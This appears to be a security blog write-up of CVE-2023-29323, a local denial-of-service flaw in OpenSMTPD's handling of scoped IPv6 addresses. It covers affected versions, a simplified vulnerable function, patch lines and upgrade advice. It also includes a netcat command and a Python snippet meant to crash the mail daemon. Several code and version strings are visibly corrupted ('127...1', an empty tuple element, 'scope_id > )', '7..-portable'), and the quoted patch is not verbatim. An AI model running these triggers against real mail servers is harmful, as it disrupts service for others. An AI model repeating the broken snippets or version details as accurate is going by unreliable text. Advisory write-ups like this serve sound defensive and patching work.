OpenBSD is famous for rock-solid security, and its mail server OpenSMTPD powers a lot of mail systems. But CVE-2023-29323 shows that sometimes, even simple things, like handling a local IPv6 address, can lead to software aborts and disrupt email delivery. In this post, we’ll break down what this vulnerability is, why it exists, how it’s exploited, and how to fix it. We’ll also provide a code example that reproduces the issue, with links to upstream sources.
What is CVE-2023-29323?
CVE-2023-29323 is a denial-of-service (DoS) vulnerability discovered in OpenSMTPD’s handling of certain IPv6 addresses. Specifically, malformed or unexpected local IPv6 addresses—those with *scopes*—cause a process-abort in the ascii_load_sockaddr function found in the smtpd daemon.
OpenBSD: Before 7.1 errata 024, and 7.2 before errata 020
- OpenBSD 7.1 errata 024
- OpenBSD 7.2 errata 020
- OpenSMTPD Portable: Before commit f748277 (version 7..-portable and before)
Vulnerability Details
When OpenSMTPD receives a new connection, it tries to capture the remote address as a string for logging and policy decisions. If that address is a *scoped* IPv6 address (e.g., fe80::1%lo), the function ascii_load_sockaddr attempts to process it, but fails due to missing code for handling so-called "scoped identifiers" in IPv6 (the %lo part).
This triggers an abort(), terminating the process handling the connection—causing mail delivery disruptions or service loss.
Let’s examine the offending code pattern (simplified, not verbatim for space)
/*
* Vulnerable: ascii_load_sockaddr in smtpd
*/
int ascii_load_sockaddr(char **out, const struct sockaddr *sa) {
// ...
if (sa->sa_family == AF_INET6) {
// Setup for IPv6 sockaddr
// ...
// Fails to handle scope_id (sa->sin6_scope_id)!
if ( ... unexpected scope id ... ) {
abort(); // <------- The crash
}
}
// ...
}
If a specially crafted connection comes from a scoped IPv6 address, this triggers abort()—crashing the SMTP process for the client.
How Can This Be Exploited?
Even though this isn’t a remote code execution bug, it’s still powerful locally: any unprivileged user with local systems access (or any process that can open a network socket locally) can crash the mail system instantly!
Bash Example with Netcat (on OpenBSD)
# Only works if netcat supports -s and IPv6 scopes:
nc -6 -s 'fe80::1%lo' 127...1 25
If the system is vulnerable, the OpenSMTPD process handling this connection will instantly abort().
You can also trigger this via Python (on the vulnerable machine)
import socket
address = ('::1', 25, , socket.if_nametoindex('lo'))
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
s.connect(address)
s.close()
On a vulnerable OpenSMTPD, this drops the connection and aborts the process.
Upstream References
- OpenBSD 7.1 Security Errata #024
- OpenBSD 7.2 Security Errata #020
- OpenSMTPD Portable Commit f748277, fix ipv6 scope abort
- OpenSMTPD Release Notes
- CVE Details, CVE-2023-29323
The Patch
The fix is straightforward: don’t abort, and handle IPv6 scope IDs correctly or ignore them.
Patch Example (from upstream commit)
- /* fail and abort if scope_id is non-zero */
- if (sin6->sin6_scope_id > )
- abort();
+ /* ignore the scope ID, proceed as normal */
If you can upgrade (pkg_add -u or similar for OpenBSD), just do it.
Impact & Recommendations
This is a classic denial-of-service: simple to trigger, can bring down crucial infrastructure instantly. While it’s not a remote execution bug, any local user (including, sometimes, poorly authenticated system processes) can cause the crash.
- Patch ASAP: Upgrade OpenBSD or OpenSMTPD Portable to a version *after* the patch above was applied.
Final Notes
Vulnerabilities like CVE-2023-29323 show that sometimes, even systems with a top reputation for security can get tripped up by networking edge cases. The good news for OpenBSD folks: the fix was rolled out quickly, so just upgrade!
Stay safe—keep your mail system patched!
##### Like this write-up? See more security news and hands-on guides at OpenSMTPD official site, OpenBSD.org, and NVD database entry.
Timeline
Published on: 04/04/2023 23:15:00 UTC
Last modified on: 04/12/2023 14:56:00 UTC